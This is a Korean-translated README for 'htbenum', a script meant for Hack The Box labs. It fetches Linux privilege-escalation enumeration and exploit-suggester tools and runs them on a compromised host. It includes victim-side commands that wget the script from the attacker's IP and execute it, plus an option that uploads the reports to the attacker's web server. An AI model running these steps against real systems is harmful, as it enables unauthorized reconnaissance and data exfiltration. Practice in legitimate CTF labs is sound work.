
Hack The Box용 리눅스 열거 스크립트
Hack The Box를 위한 Linux 열거 스크립트
이 스크립트는 Hack The Box와 같은 상황에서 Linux 호스트에 인터넷 접속이 불가능할 때 열거 및 익스플로잇 제안 스크립트를 실행해야 하는 경우를 위해 설계되었습니다. Linux 박스에서 초기 발판을 마련했을 때 항상 비슷한 스크립트 세트를 실행하게 되는데, 이 스크립트는 각 열거 스크립트의 최신 버전을 다운로드하고, 실행 가능하게 만든 후 실행하고, 출력을 나중에 검토할 수 있도록 파일로 저장하는 과정을 자동화합니다. 또한 도구를 호스팅하고 보고서를 호스트 머신으로 업로드할 수 있는 내장 웹 서버도 포함되어 있습니다.
Pull 요청/제안 환영합니다!

./htbenum.sh [-u] -i IP -p port [-o directory] [-w] [-r]
예시:
호스트 머신: root@kali:~/htbenum# ./htbenum.sh -u
호스트 머신: root@kali:~/htbenum# ./htbenum.sh -i 10.10.14.1 -p 80 -w
피해 머신: www-data@victim:/tmp$ wget http://10.10.14.1:80/htbenum.sh
피해 머신: www-data@victim:/tmp$ chmod +x ./htbenum.sh
피해 머신: www-data@victim:/tmp$ ./htbenum.sh -i 10.10.14.1 -p 80 -r
매개변수:
-h - 도움말 및 사용법 보기.
-i IP - 업로드 및 다운로드에 사용되는 수신 웹 서버의 IP 주소.
-p port - 업로드 및 다운로드에 사용되는 수신 웹 서버의 TCP 포트.
-o directory - 사용자 정의 다운로드 및 보고서 생성 디렉토리 (기본값: /tmp).
-w - 파일 다운로드 및 보고서 업로드를 위한 내장 웹 서버 시작.
-u - 각 도구를 최신 버전으로 업데이트하여 기존 버전 덮어쓰기.
-r - 보고서를 호스트 머신 웹 서버에 업로드 (PUT 요청 지원 필요).
htbenum을 사용하려면 로컬 머신에서 리포지토리를 클론하고 update 매개변수로 스크립트를 실행하세요. 그러면 인터넷(Github)에서 필요한 모든 스크립트를 다운로드 및 업데이트하여 htbenum.sh와 같은 디렉토리에 저장합니다:
root@kali:~# git clone https://github.com/SolomonSklash/htbenum
root@kali:~# cd htbenum
root@kali:~/htbenum# ./htbenum.sh -u
_ _ ___________ _____ _ _ _ ____ ___
| | | |_ _| ___ \ ___| \ | | | | | \/ |
| |_| | | | | |_/ / |__ | \| | | | | . . |
| _ | | | | ___ \ __|| . ` | | | | |\/| |
| | | | | | | |_/ / |___| |\ | |_| | | | |
\_| |_/ \_/ \____/\____/\_| \_/\___/\_| |_/
By Solomon Sklash - [email protected]
[i] 모든 도구 업데이트 중...
2019-11-25 17:54:55 URL:https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh [31859/31859] -> "lse.sh" [1]
2019-11-25 17:54:55 URL:https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh [46476/46476] -> "linenum.sh" [1]
2019-11-25 17:54:56 URL:https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py [25304/25304] -> "linuxprivchecker.py" [1]
2019-11-25 17:54:56 URL:https://raw.githubusercontent.com/initstring/uptux/master/uptux.py [29853/29853] -> "uptux.py" [1]
2019-11-25 17:54:56 URL:https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py [12614/12614] -> "suid3num.py" [1]
2019-11-25 17:54:57 URL:https://raw.githubusercontent.com/belane/linux-soft-exploit-suggester/master/linux-soft-exploit-suggester.py [13886/13886] -> "les-soft.py" [1]
2019-11-25 17:54:58 URL:https://raw.githubusercontent.com/offensive-security/exploit-database/master/files_exploits.csv [5669905/5669905] -> "files_exploits.csv" [1]
2019-11-25 17:54:58 URL:https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh [82214/82214] -> "les.sh" [1]
[i] 업데이트 완료!
root@kali:~/htbenum#
그런 다음 내장 웹 서버를 시작하여 도구를 호스팅하고 완료된 보고서를 수신합니다. 서버는 Python 3이 필요합니다. 자체 웹 서버를 사용하여 도구를 호스팅할 수도 있지만, 보고서 업로드를 위해 PUT 요청을 지원해야 합니다.
root@kali:~/htbenum# ./htbenum.sh -i 10.10.14.1 -p 80 -w
마지막으로, htbenum.sh 스크립트를 대상 머신에 업로드하고 실행 가능하게 만든 다음, 호스트 머신의 IP와 포트를 지정하여 실행합니다. 선택적으로 파일 다운로드 및 보고서 출력 작성을 위한 디렉토리를 지정할 수 있습니다. 또한 보고서를 호스트 머신에 업로드할 수도 있습니다. 예시:
www-data@htb:/tmp$ wget http://10.10.99.100/htbenum.sh -O /tmp/htbenum.sh
www-data@htb:/tmp$ chmod +x ./htbenum.sh
www-data@htb:/tmp$ ./htbenum.sh -i 10.10.14.1 -p 80 -r
각 도구는 출력 결과를 htbenum.sh 스크립트와 동일한 디렉토리 또는 -d 매개변수로 지정된 디렉토리의 보고서 파일로 보냅니다.